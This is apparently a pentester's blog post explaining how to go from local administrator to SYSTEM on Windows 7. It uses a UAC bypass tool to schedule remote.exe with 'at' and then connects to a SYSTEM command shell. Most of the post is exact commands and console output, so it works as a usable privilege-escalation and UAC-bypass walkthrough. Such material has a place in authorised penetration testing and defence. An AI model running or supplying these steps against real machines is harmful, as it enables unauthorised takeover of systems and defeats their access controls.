Admin to SYSTEM win7 with remote.exe

So i ran across this little gem from 2008!

http://blogs.technet.com/b/askds/archive/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx

I ended up using Method 2 on a recent test. The post above calls for needing an elevated command shell so you can call “at”.  This is easy if you are legitimately sitting in front of the box but if you pentesting, potentially harder.

Three scenarios:
user is regular user and cant UAC to let you run admin commands

  • user is local admin and UAC disabled.
  • user is local admin buy you have to bypass UAC

easiest way sitting on a command shell is probably just to type “at”\

ohh man, denied 😦

 

yay!

Scenario 1, your screwed, gonna have to solve the not admin problem first.

anger!

Scenario 2, no UAC…just follow the linked blog post. Get a copy of remote.exe either x86 or x64 whatever architecture the system you want to run it on is and do the following command:

AT #TIME_TO_RUN c:\pathto\remote.exe /s cmd SYSCMD

once it runs, connect to the debugger you started (with SYSTEM privs)

C:\path\REMOTE.EXE /c SYSTEM_NAME SYSCMD

you should see something like this:

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:23 PM]

C:\Windows\system32>whoami
whoami
nt authority\system

weeeeeeeeeeeeeeeeeeee!
Scenario 3, you can use bypassuac to get around our UAC issues.

get bypassuac on your system, then run it like so

C:\pathto\>at
Access is denied.

C:\pathto\>bypassuac.exe
Too few arguments
Incorrect input. Please find samples below.
Note, ‘elevate stuff’ will be executed in the elevated shell as ‘cmd.exe stuff’

elevate /c
elevate /c [arg1] [arg2] .. [argn]
elevate –pid 1234 /c [arg1] [arg2] .. [argn]
elevate /c c:\path\foo.exe [arg1] [arg2] .. [argn]
elevate –pid 1234 /c c:\path\foo.exe [arg1] [arg2] .. [argn]

C:\pathto\>bypassuac.exe /c at 16:32 C:\pathtop\remotex64.exe /s cmd SYSCMD
Added a new job with job ID = 31

C:\pathto\>at
Access is denied.

dont worry,  it worked 🙂

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:32 PM]

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s